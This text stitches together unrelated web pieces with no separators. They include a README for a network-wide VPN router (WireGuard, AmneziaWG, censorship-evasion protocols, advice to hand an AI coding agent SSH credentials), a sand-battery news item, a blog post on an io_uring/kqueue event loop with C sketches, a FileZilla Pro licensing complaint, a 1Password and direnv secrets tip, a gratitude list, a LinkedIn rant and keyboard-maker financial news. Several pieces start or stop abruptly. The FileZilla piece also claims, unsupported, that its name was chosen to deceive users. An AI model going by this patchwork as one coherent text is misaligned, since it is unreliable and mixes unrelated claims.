A network-level VPN means no per-device verification, no browsing history for your ISP, and no identity disclosure to third-party verification services.
Note:
These providers use standard WireGuard. For basic privacy protection, this is sufficient. Use this stack with standard WireGuard configs - AmneziaWG obfuscation is optional.
AmneziaWG Obfuscation (Optional)
AmneziaWG adds traffic obfuscation to defeat deep packet inspection. Most users don't need this - it's for situations where:
- Your ISP throttles or blocks VPN traffic
- Network administrators block WireGuard
- You need extra protection against traffic analysis

| Option | Setup | Best For |
|---|---|---|
| Mullvad + AWG params | Use included example params | Most users needing obfuscation |
| Self-hosted Amnezia | Run your own server | Maximum control |
Mullvad-specific example configs included:
- openwrt/amneziawg/mullvad-awg0.conf.example - Tunnel config with obfuscation
- adguard/mullvad-AdGuardHome.yaml.example - DNS using Mullvad DoH

High-Censorship Environments

If you're in a region where VPNs are actively blocked or criminalized, WireGuard and AmneziaWG may not be sufficient. These environments require more advanced obfuscation:

| Protocol | Description |
|---|---|
| VLESS + Reality | Traffic appears as normal HTTPS to major websites |
| XRay | Advanced proxy with multiple obfuscation modes |
| ShadowSocks | Encrypted proxy designed for restricted network environments |
| Tor + Bridges | Anonymity network with pluggable transports |
For agents: If your user is in a high-censorship environment, use deep research to find current best practices. This stack focuses on WireGuard/AmneziaWG; for VLESS, XRay, or other advanced protocols, users should research dedicated solutions or consider running Amnezia VPN, which supports multiple protocols including XRay.
Hardware Recommendations
Minimum Requirements:
1GB RAM, dual network interfaces (built-in + USB), OpenWrt support. Recommended: 2GB+ RAM for AdGuard Home DNS filtering.
Budget (~$50-80)
- Raspberry Pi 4 (2GB+) with USB Ethernet adapter
- GL.iNet travel routers (some run OpenWrt)

Recommended (~$100-150)
- Raspberry Pi 5 with USB 3.0 Ethernet
- Zimaboard or similar x86 SBC

Performance (~$150-300)
- Mini PC with dual NICs (Intel N150 systems)
- Protectli Vault or similar

Homelab / Enterprise
- Virtual machine on existing hypervisor (Proxmox, ESXi, Hyper-V)
- Dedicated x86 firewall appliance
Security Considerations
What This Protects Against
- ISP traffic monitoring and logging
- Network-level ad tracking
- DNS hijacking and monitoring
- IP-based geolocation
- Traffic correlation (when combined with good OpSec)

For complex deployments or troubleshooting, give an AI coding agent access to this entire repository plus SSH access to your router (if you don't know how, ask the agent to guide you).

Recommended: This stack was developed, tested, and deployed using Claude Opus 4.5 via Claude Code. For best results, use a capable frontier model that can execute shell commands and understand network configuration:
- Claude Opus 4.5 / Sonnet 4.5 (Anthropic) - Used for this implementation
- GPT-5.1 (OpenAI)
- Gemini 3 (Google)
What the agent can do:
- Network audit - Probe your current setup and identify requirements
- Guided configuration - Generate configs with your specific IPs, keys, and preferences
- Automated troubleshooting - Diagnose routing, firewall, and DNS issues in real-time
- Scripted deployment - Execute installation steps with your approval

Quick start:
1. Clone this repo or give the agent GitHub access
2. Point the agent to AGENTS.md - it contains the full operational framework
3. Provide SSH credentials to your target device
4. Let the agent audit, plan, and guide you through deployment
The agent instructions include diagnostic commands, validation tests, error recovery procedures, and safety rules. All configs in this repo are parameterized and agent-friendly.
Q: Will this slow down my internet?
A: Minimal impact. WireGuard is extremely efficient. Most users see <5% speed reduction. The main factor is your VPN provider's server quality.
Q: Can I still access local network devices?
A: Yes. LAN traffic stays local and doesn't go through the VPN.
Q: What if the privacy router fails?
A: Your network loses internet until it's fixed or bypassed. This is a feature, not a bug - it ensures no unprotected traffic leaks.
Q: Can I exclude certain devices from the VPN?
A: Yes, with additional configuration. You can create firewall rules to route specific IPs directly to WAN. See CONFIGURATION.md.
Q: Does this work with IPv6?
A: IPv6 is disabled to prevent leaks. Most VPN providers don't properly support IPv6 yet.
Q: Can my ISP see I'm using a VPN?
A: With standard WireGuard, they can see VPN-like traffic. With AmneziaWG obfuscation, the traffic appears as random noise.
Q: How does this help with age verification privacy concerns?
A: A VPN routes your traffic through an encrypted tunnel, preventing your ISP from logging which sites you visit. This is a privacy tool - it stops third-party age verification services from correlating your browsing activity across sites or building behavioral profiles. Your actual age verification with platforms remains between you and that platform, not shared with ISPs or data brokers. For specific compliance questions, consult local regulations.
Q: Will this work after the Australia social media ban takes effect?
A: This stack protects your network traffic from ISP logging and provides privacy for all devices. The December 2025 Australian legislation primarily affects platform-side verification. A VPN ensures your ISP cannot see which sites you visit, regardless of platform-level requirements.
Q: Is this legal?
A: VPN use is legal in most Western countries including the UK, Australia, US, and EU. This stack is a privacy tool similar to HTTPS - it encrypts your traffic. Using a VPN to access content available in your region is generally legal. Always check your local laws.
Protect your entire network. Set it and forget it.
250MWh 'Sand Battery' to start construction in Finland
Polar Night Energy and Lahti Energia are partnering on the Sand Battery project in Finland. Image: Polar Night Energy / Lahti Energia.
Technology provider Polar Night Energy and utility Lahti Energia have partnered for a large-scale project using Polar’s ‘Sand Battery’ technology for the latter’s district heating network in Vääksy, Finland.
The project will have a heating power of 2MW and a thermal energy storage (TES) capacity of 250MWh, making it a 125-hour system and the largest sand-based TES project once complete.
It will supply heat to Lahti Energia’s Vääksy district heating network but is also large enough to participate in Fingrid’s reserve and grid balancing markets.
Polar Night Energy’s technology works by heating a sand or a similar solid material using electricity, retaining that heat and then discharging that for industrial or heating use.
The project will cut fossil-based emissions in the Vääksy district heating network by around 60% each year, by reducing natural gas use by 80% and also decreasing wood chip consumption.
This latest project will use locally available natural sand, held in a container 14m high and 15m wide. Lahti Energia received a grant for the project from state body Business Finland.
Polar Night Energy will act as the main contractor for the construction project, with on-site work beginning in early 2026, and the Sand Battery will be completed in summer 2027.
“We want to offer our customers affordable district heating and make use of renewable energy in our heat production. The scale of this Sand Battery also enables us to participate in Fingrid’s reserve and grid balancing markets. As the share of weather-dependent energy grows in the grid, the Sand Battery will contribute to balancing electricity supply and demand”, says Jouni Haikarainen, CEO of Lahti Energia.
A Programmer-Friendly I/O Abstraction Over io_uring and kqueue
Consider this tale of I/O and performance. We’ll start with blocking
I/O, explore io_uring and kqueue, and take home an event loop very
similar to some software you may find familiar.
When you want to read from a file you might open() and then call read() as many times as necessary to fill a buffer of bytes from the file. And in the opposite direction, you call write() as many times as needed until everything is written. It’s similar for a TCP client with sockets, but instead of open() you first call socket() and then connect() to your server. Fun stuff.
In the real world though you can’t always read everything you want
immediately from a file descriptor. Nor can you always write everything
you want immediately to a file descriptor.
You can switch a file descriptor into non-blocking mode so the call won’t block while data you requested is not available. But system calls are still expensive, incurring context switches and cache misses. In fact, networks and disks have become so fast that these costs can start to approach the cost of doing the I/O itself. For the duration of time a file descriptor is unable to read or write, you don’t want to waste time continuously retrying read or write system calls.
So you switch to io_uring on Linux or kqueue on FreeBSD/macOS. (I’m
skipping the generation of epoll/select users.) These APIs let you
submit requests to the kernel to learn about readiness: when a file
descriptor is ready to read or write. You can send readiness requests in
batches (also referred to as queues). Completion events, one for each
submitted request, are available in a separate queue.
Being able to batch I/O like this is especially important for TCP
servers that want to multiplex reads and writes for multiple connected
clients.
However in io_uring, you can even go one step further. Instead of having to call read() or write() in userland after a readiness event, you can request that the kernel do the read() or write() itself with a buffer you provide. Thus almost all of your I/O is done in the kernel, amortizing the overhead of system calls.
If you haven’t seen io_uring or kqueue before, you’d probably like an
example! Consider this code: a simple, minimal, not-production-ready TCP
echo server.
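As a rough stand-in for that example, here is a C/liburing sketch of the idea: a simple, minimal, not-production-ready TCP echo server that serves one client at a time, with error handling omitted. The post's own example differs in detail and language.

```c
#include <arpa/inet.h>
#include <liburing.h>
#include <netinet/in.h>
#include <stdint.h>
#include <sys/socket.h>
#include <unistd.h>

enum { OP_ACCEPT = 1, OP_READ, OP_WRITE };

int main(void) {
    struct io_uring ring;
    io_uring_queue_init(8, &ring, 0);

    int listen_fd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = { .sin_family = AF_INET,
                                .sin_port = htons(8080),
                                .sin_addr.s_addr = htonl(INADDR_ANY) };
    bind(listen_fd, (struct sockaddr *)&addr, sizeof addr);
    listen(listen_fd, 16);

    char buf[4096];
    int client_fd = -1;

    /* Ask the kernel to accept a connection. */
    struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
    io_uring_prep_accept(sqe, listen_fd, NULL, NULL, 0);
    io_uring_sqe_set_data(sqe, (void *)(uintptr_t)OP_ACCEPT);

    for (;;) {
        io_uring_submit(&ring);

        struct io_uring_cqe *cqe;
        io_uring_wait_cqe(&ring, &cqe);
        uintptr_t op = (uintptr_t)io_uring_cqe_get_data(cqe);
        int res = cqe->res;
        io_uring_cqe_seen(&ring, cqe);

        sqe = io_uring_get_sqe(&ring);
        if (op == OP_ACCEPT) {                 /* new client: start reading   */
            client_fd = res;
            io_uring_prep_recv(sqe, client_fd, buf, sizeof buf, 0);
            io_uring_sqe_set_data(sqe, (void *)(uintptr_t)OP_READ);
        } else if (op == OP_READ && res > 0) { /* echo back what we just read */
            io_uring_prep_send(sqe, client_fd, buf, (size_t)res, 0);
            io_uring_sqe_set_data(sqe, (void *)(uintptr_t)OP_WRITE);
        } else if (op == OP_WRITE) {           /* wait for the next read      */
            io_uring_prep_recv(sqe, client_fd, buf, sizeof buf, 0);
            io_uring_sqe_set_data(sqe, (void *)(uintptr_t)OP_READ);
        } else {                               /* client closed or error      */
            close(client_fd);
            io_uring_prep_accept(sqe, listen_fd, NULL, NULL, 0);
            io_uring_sqe_set_data(sqe, (void *)(uintptr_t)OP_ACCEPT);
        }
    }
}
```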
This is a great, minimal example. But notice that this code ties
io_uring behavior directly to business logic (in this case, handling
echoing data between request and response). It is fine for a small
example like this. But in a large application you might want to do I/O
throughout the code base, not just in one place. You might not want to
keep adding business logic to this single loop.
Instead, you might want to be able to schedule I/O and pass a
callback (and sometimes with some application context) to be called when
the event is complete.
The interface might look like:
io_dispatch.dispatch({
    // some big struct/union with relevant fields for all event types
}, my_callback);
This is great! Now your business logic can schedule and handle I/O no
matter where in the code base it is.
Under the hood it can decide whether to use io_uring or kqueue
depending on what kernel it’s running on. The dispatch can also batch
these individual calls through io_uring or kqueue to amortize system
calls. The application no longer needs to know the details.
Additionally, we can use this wrapper to stop thinking about
readiness events, just I/O completion. That is, if we dispatch a read
event, the io_uring implementation would actually ask the kernel to read
data into a buffer. Whereas the kqueue implementation would send a
“read” readiness event, do the read back in userland, and then call our
callback.
And finally, now that we’ve got this central dispatcher, we don’t
need spaghetti code in a loop switching on every possible submission and
completion event.
Every time we call io_uring or kqueue we both submit event requests
and poll for completion events. The io_uring and kqueue APIs tie these
two actions together in the same system call.
To sync our requests to io_uring or kqueue we’ll build a flush function that submits requests and polls for completion events. (In the next section we’ll talk about how the user of the central dispatch learns about completion events.)

To make flush more convenient, we’ll build a nice wrapper around it so that we can submit as many requests (and process as many completion events) as possible. To avoid accidentally blocking indefinitely we’ll also introduce a time limit. We’ll call the wrapper run_for_ns.

Finally we’ll put the user in charge of setting up a loop to call this run_for_ns function, independent of normal program execution.

This is now your traditional event loop.
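In outline, that user-driven loop might look like the sketch below; io_run_for_ns and application_tick are illustrative stand-ins, not the library's actual names:

```c
#include <stdint.h>

void io_run_for_ns(uint64_t ns);  /* submit requests + poll completions for up to ns */
void application_tick(void);      /* normal (non-I/O) program work                   */

void main_loop(void) {
    for (;;) {
        io_run_for_ns(10u * 1000 * 1000);  /* pump I/O for up to 10 ms per iteration */
        application_tick();
    }
}
```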
You may have noticed that in the API above we passed a callback. The
idea is that after the requested I/O has completed, our callback should
be invoked. But the question remains: how to track this callback between
the submission and completion queue?
Thankfully, io_uring and kqueue events have user data fields. The
user data field is opaque to the kernel. When a submitted event
completes, the kernel sends a completion event back to userland
containing the user data value from the submission event.
We can store the callback in the user data field by setting it to the
callback’s pointer casted to an integer. When the completion for a
requested event comes up, we cast from the integer in the user data
field back to the callback pointer. Then, we invoke the callback.
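In io_uring terms (C with liburing), that round trip might look roughly like this sketch; submit_read and drain_completions are made-up helper names for illustration:

```c
#include <liburing.h>
#include <stdint.h>

typedef void (*io_callback)(int result);

/* Submission: stash the callback pointer, cast to an integer, in user data. */
static void submit_read(struct io_uring *ring, int fd, void *buf, unsigned len,
                        io_callback cb) {
    struct io_uring_sqe *sqe = io_uring_get_sqe(ring);
    io_uring_prep_read(sqe, fd, buf, len, 0);
    io_uring_sqe_set_data64(sqe, (uint64_t)(uintptr_t)cb);
}

/* Completion: cast the integer back to the callback pointer and invoke it. */
static void drain_completions(struct io_uring *ring) {
    struct io_uring_cqe *cqe;
    while (io_uring_peek_cqe(ring, &cqe) == 0) {
        io_callback cb = (io_callback)(uintptr_t)io_uring_cqe_get_data64(cqe);
        cb(cqe->res);
        io_uring_cqe_seen(ring, cqe);
    }
}
```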
As described above, the struct for io_dispatch.dispatch could get quite large handling all the different kinds of I/O events and their arguments. We could make our API a little more expressive by creating wrapper functions for each event type. So if we wanted to schedule a read, we could call something like the hypothetical wrapper below:
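```
// Hypothetical wrapper call; the real API's names and argument order differ.
io_dispatch.read(fd, buffer, buffer_len, offset, my_read_callback);
```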
One more thing we need to worry about is that the batch we pass to
io_uring or kqueue has a fixed size (technically, kqueue allows any
batch size but using that might introduce unnecessary allocations). So
we’ll build our own queue on top of our I/O abstraction to keep track of
requests that we could not immediately submit to io_uring or kqueue.
To keep this API simple we could allocate for each entry in the queue. Or we could modify the io_dispatch.X calls slightly to accept a struct that can be used in an intrusive linked list to contain all request context, including the callback. The latter is what we do in TigerBeetle.
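A minimal C sketch of what such an intrusive request struct could look like (the field names are illustrative, not TigerBeetle's actual layout):

```c
/* Each request carries its own queue link, so the overflow queue
 * needs no allocations of its own. */
struct io_request {
    struct io_request *next;  /* intrusive link used by the overflow queue */
    int                op;    /* read, write, accept, ...                  */
    int                fd;
    void              *buf;
    unsigned           len;
    void             (*callback)(struct io_request *req, int result);
};
```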
Put another way: every time code calls io_dispatch, we’ll try to immediately submit the requested event to io_uring or kqueue. But if there’s no room, we store the event in an overflow queue.

The overflow queue needs to be processed eventually, so we update our flush function (described in Callbacks and context above) to pull as many events as possible from our overflow queue before submitting a batch to io_uring or kqueue.
We’ve now built something similar to libuv, the I/O library that Node.js uses. And if you squint, it is basically TigerBeetle’s I/O library! (And interestingly enough, TigerBeetle’s I/O code was adopted into Bun! Open-source for the win!)

Let’s check out how the Darwin version of TigerBeetle’s I/O library (with kqueue) differs from the Linux version. As mentioned, the complete send call in the Darwin implementation waits for file descriptor readiness (through kqueue). Once ready, the actual send call is made back in userland.
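Conceptually, that kqueue path looks something like this C sketch, simplified and blocking for clarity; it is not TigerBeetle's actual code, which registers interest without blocking and fires the callback from the event loop:

```c
#include <stddef.h>
#include <sys/event.h>
#include <sys/socket.h>

/* Wait for write-readiness on fd, then perform the send() in userland. */
static void send_when_ready(int kq, int fd, const void *buf, size_t len) {
    struct kevent change, event;

    /* Register one-shot interest in "fd is writable". */
    EV_SET(&change, fd, EVFILT_WRITE, EV_ADD | EV_ONESHOT, 0, 0, NULL);
    kevent(kq, &change, 1, NULL, 0, NULL);

    /* Block until the readiness event arrives... */
    kevent(kq, NULL, 0, &event, 1, NULL);

    /* ...then do the actual I/O ourselves, back in userland. */
    send(fd, buf, len, 0);
}
```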
Similarly, take a look at flush on Linux and macOS for event processing. Look at run_for_ns on Linux and macOS for the public API users must call. And finally, look at what puts this all into practice, the loop calling run_for_ns in src/main.zig.
We’ve come this far and you might be wondering: what about cross-platform support for Windows? The good news is that Windows also has a completion-based system similar to io_uring but without batching, called IOCP. And for bonus points, TigerBeetle provides the same I/O abstraction over it! But it’s enough to cover just Linux and macOS in this post. :)
In both this blog post and in TigerBeetle, we implemented a single-threaded event loop. Keeping I/O code single-threaded in userspace is beneficial (whether or not I/O processing is single-threaded in the kernel is not our concern). It’s the simplest code and best for workloads that are not embarrassingly parallel. It is also best for determinism, which is integral to the design of TigerBeetle because it enables us to do Deterministic Simulation Testing.
But there are other valid architectures for other workloads.
For workloads that are embarrassingly parallel, like many web
servers, you could instead use multiple threads where each thread has
its own queue. In optimal conditions, this architecture has the highest
I/O throughput possible.
But if each thread has its own queue, individual threads can become
starved if an uneven amount of work is scheduled on one thread. In the
case of dynamic amounts of work, the better architecture would be to
have a single queue but multiple worker threads doing the work made
available on the queue.
Hey, maybe we’ll split this out so you can use it too. It’s written in Zig so we can easily expose a C API. Any language with a C foreign function interface (i.e. every language) should work well with it. Keep an eye on our GitHub. :)
FileZilla Pro “Perpetual License” - A Warning to All Users
This is a blunt warning to anyone who ever purchased, or is thinking about purchasing, FileZilla Pro.
I bought FileZilla Pro under a perpetual license - a one-time payment, lifetime right to use the version I purchased. After reinstalling my operating system, I simply needed to reinstall the software I already paid for.
Here’s what happened:
- Support admitted I still have the legal right to use the old version of FileZilla Pro that I originally purchased.
- Then they told me they refuse to provide the installer for that version.
- Their excuse: “For security reasons we do not provide older versions.”

The impact: If a customer cannot download the installer, the “perpetual license” is dead. It doesn’t matter what rights they acknowledge on paper - they are blocking any practical way to use the software unless you pay again under their new subscription model.

- There is no way to reinstall.
- There is no way to access the product you bought.
- Your “perpetual license” effectively becomes worthless the moment you reinstall your OS or lose the installer.
What this means for users: FileZilla is fully aware that customers legally own those old versions. They openly admit it. And then they withhold the installer anyway, leaving users with no realistic option except paying again.

If you’re considering FileZilla Pro, understand exactly what you are walking into: you can pay for a perpetual license, and later be denied any way to reinstall the product you legally own.
Name clarification

Although “Zilla” appears in the name, the FileZilla project is not affiliated with Mozilla in any way. The similarity in naming is not coincidental. Their intention is to deceive users into thinking this project is related to Mozilla so they can sell perpetual licenses that do not persist across OS reinstalls.
Sometimes you need to set environment variables with secrets, API keys or tokens, but they can be susceptible to exfiltration by malware, as seen during the recent Shai-Hulud attack.
Install the 1Password CLI (op), then open 1Password > Settings > Developer > Integrate with 1Password CLI.
Then you can use the op command with your password item’s name in 1Password:
$ op item get "My secret item" --fields password
[use 'op item get xkm4wrtpvnq8hcjd3yfzs2belg --reveal' to reveal]
This obscures the actual password, and gives the item’s ID. You can use this ID:
$ op item get xkm4wrtpvnq8hcjd3yfzs2belg --fields password
[use 'op item get xkm4wrtpvnq8hcjd3yfzs2belg --reveal' to reveal]
Use --reveal to see the actual password:
$ op item get "My secret item" --fields password --reveal
my-secret-password
$ op item get xkm4wrtpvnq8hcjd3yfzs2belg --fields password --reveal
my-secret-password
Alternatively, use a secret reference. Open the item in 1Password, next to the password click ⌄ and select Copy Secret Reference, then op read it:

$ op read "op://MyVault/xkm4wrtpvnq8hcjd3yfzs2belg/password"
my-secret-password
The secret reference is made up of the vault name, item ID and field name, and op read doesn’t need --reveal.
direnv is a handy shell tool that can load and unload environment variables depending on your current directory.

Next, let’s set up direnv so that when you cd into a certain directory, it fetches the password from 1Password and sets it as an env var. When cd-ing out, the env var is unloaded.
(I first got “Warning: direnv not found. Please install direnv and ensure it’s in your PATH before using this plugin”, so I needed to move eval "$(/opt/homebrew/bin/brew shellenv)" before source $ZSH/oh-my-zsh.sh.)
Now, in your project directory, create a file called .envrc containing an env var export that calls op:
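A minimal sketch of such a .envrc, reusing the secret reference from above (adjust the vault, item and variable names to your own setup):

```
# .envrc
export MY_SECRET="$(op read "op://MyVault/xkm4wrtpvnq8hcjd3yfzs2belg/password")"
export DEBUG=1
```

After saving it, run direnv allow once so direnv is permitted to load the file.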
Sometimes it shows a warning because of the 1Password UI prompt, but it’s okay:
$ cd my-project
direnv: loading ~/my-project/.envrc
direnv: ([/opt/homebrew/bin/direnv export zsh]) is taking a while to execute. Use CTRL-C to give up.
direnv: export +DEBUG +MY_SECRET
That your dog, while she appears to love you only because she’s been adapted by evolution to appear to love you, really does love you.
That if you’re a life form and you cook up a baby and copy your genes to them, you’ll find that the genes have been degraded due to oxidative stress et al., which isn’t cause for celebration, but if you find some other hopefully-hot person and randomly swap in half of their genes, your baby will still be somewhat less fit compared to you and your hopefully-hot friend on average, but now there is variance, so if you cook up several babies, one of them might be as fit or even fitter than you, and that one will likely have more babies than your other babies have, and thus complex life can persist in a universe with increasing entropy.
That if we wanted to, we surely could figure out which of the 300-ish strains of rhinovirus are circulating in a given area at a given time and rapidly vaccinate people to stop it and thereby finally “cure” the common cold, and though this is too annoying to pursue right now, it seems like it’s just a matter of time.
That if you look back at history, you see that plagues went from Europe to the Americas but not the other way, which suggests that urbanization and travel are great allies for infectious disease, and these both continue today but are held in check by sanitation and vaccines even while we have lots of tricks like UVC light and high-frequency sound and air filtration and waste monitoring and paying people to stay home that we’ve barely even put in play.
That while engineered infectious diseases loom ever-larger as a potential very big problem, we also have lots of crazier tricks we could pull out like panopticon viral screening or toilet monitors or daily individualized saliva sampling or engineered microbe-resistant surfaces or even dividing society into cells with rotating interlocks or having people walk around in little personal spacesuits, and while admittedly most of this doesn’t sound awesome, I see no reason this shouldn’t be a battle that we would win.
That clean water, unlimited, almost free.
That dentistry.
That tongues.
That radioactive atoms either release a ton of energy but also quickly stop existing—a gram of Rubidium-90 scattered around your kitchen emits as much energy as ~200,000 incandescent lightbulbs but after an hour only 0.000000113g is left—or don’t put out very much energy but keep existing for a long time—a gram of Carbon-14 only puts out the equivalent of 0.0000212 light bulbs but if you start with a gram, you’ll still have 0.999879g after a year—so it isn’t actually that easy to permanently poison the environment with radiation although Cobalt-60 with its medium energy output and medium half-life is unfortunate, medical applications notwithstanding I still wish Cobalt-60 didn’t exist, screw you Cobalt-60.
That while curing all cancer would only increase life expectancy by ~3 years and curing all heart disease would only increase life expectancy by ~3 years, and preventing all accidents would only increase life expectancy by ~1.5 years, if we did all of these at the same time and then a lot of other stuff too, eventually the effects would go nonlinear, so trying to cure cancer isn’t actually a waste of time, thankfully.
That the peroxisome, while the mitochondria and their stupid Krebs cycle get all the attention, when a fatty-acid that’s too long for them to catabolize comes along, who you gonna call.
That we have preferences, that there’s no agreed ordering of how good different things are, which is neat, and not something that would obviously be true for an alien species, and given our limited resources probably makes us happier on net.
That cardamom, it is cheap but tastes expensive, if cardamom cost 1000× more, people would brag about how they flew to Sri Lanka so they could taste chai made with fresh cardamom and swear that it changed their whole life.
That Gregory of Nyssa, he was right.
That Grandma Moses, it’s not too late.
That sleep, that probably evolution first made a low-energy mode so we don’t starve so fast and then layered on some maintenance processes, but the effect is that we live in a cycle and when things aren’t going your way it’s comforting that reality doesn’t stretch out before you indefinitely but instead you can look forward to a reset and a pause that’s somehow neither experienced nor skipped.
That, glamorous or not, comfortable or not, cheap or not, carbon emitting or not, air travel is very safe.
That, for most of the things you’re worried about, the markets are less worried than you and they have the better track record, though not the issue of your mortality.
That sexual attraction to romantic love to economic unit to reproduction, it’s a strange bundle, but who are we to argue with success.
That every symbolic expression recursively built from differentiable elementary functions has a derivative that can also be written as a recursive combination of elementary functions, although the latter expression may require vastly more terms.
That every expression graph built from differentiable elementary functions and producing a scalar output has a gradient that can itself be written as an expression graph, and furthermore that the latter expression graph is always the same size as the first one and is easy to find, and thus that it’s possible to fit very large expression graphs to data.
That, eerily, biological life and biological intelligence does not appear to make use of that property of expression graphs.
That if you look at something and move your head around, you observe the entire light field, which is a five-dimensional function of three spatial coordinates and two angles, and yet if you do something fancy with lasers, somehow that entire light field can be stored on a single piece of normal two-dimensional film and then replayed later.
That, as far as I can tell, the reason five-dimensional light fields can be stored on two-dimensional film simply cannot be explained without quite a lot of wave mechanics, a vivid example of the strangeness of this place and proof that all those physicists with their diffractions and phase conjugations really are up to something.
That disposable plastic, littered or not, harmless when consumed as thousands of small particles or not, is popular for a reason.
That disposable plastic, when disposed of correctly, is literally carbon sequestration, and that if/when air-derived plastic replaces dead-plankton-derived plastic, this might be incredibly convenient, although it must be said that currently the carbon in disposable plastic only represents a single-digit percentage of total carbon emissions.
That rocks can be broken into pieces and then you can’t un-break the pieces but you can check that they came from the same rock, it’s basically cryptography.
That the deal society has made is that if you have kids then everyone you encounter is obligated to chip in a bit to assist you, and this seems to mostly work without the need for constant grimy negotiated transactions as Econ 101 would suggest, although the exact contours of this deal seem to be a bit murky.
That of all the humans that have ever lived, the majority lived under some kind of autocracy, with the rest distributed among tribal bands, chiefdoms, failed states, and flawed democracies, and only something like 1% enjoyed free elections and the rule of law and civil liberties and minimal corruption, yet we endured and today that number is closer to 10%, and so if you find yourself outside that set, do not lose heart.
That if you were in two dimensions and you tried to eat something then maybe your body would split into two pieces since the whole path from mouth to anus would have to be disconnected, so be thankful you’re in three dimensions, although maybe you could have some kind of jigsaw-shaped digestive tract so your two pieces would only jiggle around or maybe you could use the same orifice for both purposes, remember that if you ever find yourself in two dimensions, I guess.
Disclaimer: this is based on emotions and not much else
I'm so tired of reading the same post 10x because everyone wants to be included.
What's hot right now is the Cloudflare outage. Everyone misses the actual issue: there was no automated testing or QA in place that would have caught this bug. Even a feature flag would've been sufficient so they could've seen the issue early on.
This is what every LinkedIn poster does:
1. Open ChatGPT
2. "Rewrite this LinkedIn post about the Cloudflare outage"
3. AI steers towards the use of .unwrap()
4. LinkedIn man doesn't fact-check anything or read the post-mortem
Result: "Le unwrap is le dangerous. Here's how the unwrap works"
I'm so fucking tired. I don't care about your company, nor do I care about you. I don't care because YOU don't care either about what you post. You don't care about your career, only how it looks. In hindsight, this is the perfect representation of how LLMs function, so I'm not surprised managers are best friends with ChatGPT.
I'm not surprised corporate social media is lifeless, but I'm surprised no one actually cares. How do these people stay motivated to do anything. It can't just be money, right?
I added a disclaimer because I do feel like this post is very short-sighted. This feeling is rooted in the fact that I'm tired of corporate hell, and it has resulted in me not being very productive at work. That, in turn, resulted in me being let go soon (also known as a PIP!).
You can skip this part if you don't care about my career.
When I started out at $COMPANY, it was mostly building tools with, from time to time, a manager doing a check-up. This worked amazingly, as I had time to learn and improve, and I was able to deliver.
Fast-forward a few months, we now have 3 managers, 1 dev (hi), and a buttload of busywork that needs to be done yesterday. From what I understand, a manager is supposed to be your safety net and keep the context switching to a minimum. Tickets should feel like little updates, yet they take up 40% of my work (which could've been spent on solutioning). Since I'm the lead dev, any busywork pushes tickets further back. This also means I'm to blame, because I should've alerted them way earlier about the project's drift. I'M NOT A PM! It's my job to build the project and keep you up to date. If that isn't sufficient, then go to the PM (oh wait, that's not me!). Another big issue I have with this workflow is that we sometimes shift prioritization mid-cycle due to client requests. This would be fine if it weren't low-priority stuff a client wants but doesn't need.
I get almost nothing done and I've grown tired of living in Linear. I wouldn't say I'm burnt out. Similarly to an orgasm, you'd know if you had one. The company has turned into a startup with only the shortcomings and all of the corporate hell I wanted to avoid.

As I mentioned before, I'm being let go in January (as well as other people at the company). 2026 is going to start interestingly, but I think it will be freeing. I still wish everyone at the company the best, because there are some smart and kind people I will miss.
DeepSeekMath-V2: Towards Self-Verifiable Mathematical Reasoning [pdf]
The deficit at Cherry is adding up. From January 2025 to the end of September, the company made a net loss of almost 20.4 million euros, with a turnover of 70.7 million euros. Cherry now has more debt than equity (equity deficit), which recently led to an extraordinary general meeting.
Made in China
Chief Operating Officer (COO) Udo Streller announced there that the switch production in Auerbach has now been completely discontinued. Instead, Cherry has outsourced production to "established partners in China and Slovakia".
The patent for the Cherry MX design finally expired in 2014. Since then, more and more Chinese companies have been producing switches that are also of comparable quality to Cherry's. Alternatives include JWK, Gateron, SP Star, Kailh, KTT, Outemu, and Tecsee. Switches from China were among the first to be lubricated with grease or oil from the factory. They are also experimenting with materials. Cherry is lagging behind its Far Eastern competitors in so-called Hall effect switches with magnetic fields.
There are now countless switch variants. Providers like Razer and Logitech also have their self-marketed types produced by Chinese manufacturers, such as Kailh.
Auerbach will henceforth function as a "cost-effective development, logistics, and service hub" for Cherry. Contracts with an external logistics partner expire at the end of the year.
There are now countless keyboard switches from various manufacturers, mostly in colorful housings.
(Image: Mark Mantel/ heise medien)
Partial sale
Restructuring, loans, and capital injections from investors are not enough to keep Cherry afloat. The manufacturer therefore wants to sell either the peripherals division or the Digital Health & Solutions division to use the proceeds to boost the remaining division.
The peripherals business includes all keyboards and mice, including gaming and office models. Switches are separate from this and are part of the Components division. Digital Health & Solutions includes card readers, PIN pads, and telematics-compliant applications such as the TI Messenger.
CFO Jurjen Jongma said at the general meeting: "Due to the group's low market capitalization and the current share price of Cherry below one euro, it is currently neither possible nor advisable to strengthen the group's equity in any way other than through strategic mergers & acquisitions options."
Cherry has already sold the hygiene peripheral device division "Active Key" for 12.5 million plus an option for an additional 8.5 million euros upon achievement of financial targets. Active Key included, for example, washable keyboards.
Sales slump
According to its statements, Cherry benefited from high demand during the coronavirus pandemic, which has since subsided. In 2021, Cherry's turnover was still 168.5 million euros. In 2022, annual sales of gaming products halved to 41.2 million euros. In 2023, it recovered, but the Digital Health & Solutions division slipped by a good 30 percent to 23 million euros. Components turnover halved to 10.9 million euros.
In 2025 (until the end of September), gaming and office peripherals have so far generated 50.3 million euros in sales, Digital Health & Solutions 16.5 million, and components 3.9 million. In healthcare, Cherry is facing a shift: around 90,000 medical supply providers, such as physiotherapists, will only be connected to the telematics infrastructure on October 1, 2027, instead of January 1, 2026.
This article was originally published in German. It was translated with technical assistance and editorially reviewed before publication.
The 20+ best US Black Friday tech deals on TVs, tablets, phones, smart watches and more
Guardian
www.theguardian.com
2025-11-27 18:20:50
Black Friday started off as a way to score some great deals on gifts, but let’s be honest: it’s also a chance to pick up some nice, deeply discounted goodies for yourself. This is especially true in the world of tech, where high prices and personal taste mean it’s often just safest to buy what works for you rather than guessing on a gift. Don’t worry, we won’t judge.
But when you’re inundated with Black Friday and Cyber Monday deals, it’s easy to get spun around by specs: is that really enough storage? Is the screen big enough? Will I regret not getting the newer version? That’s when you turn to the experts.
I’ve been a professional tech reviewer since 2013 and I have reviewed all manner of gadgets, from phones to keyboards and even augmented reality glasses. If they ever put Wi-Fi in a hamburger, I’ll tell you what’s great about it, and what still needs work.
How I selected these Black Friday and Cyber Monday tech deals
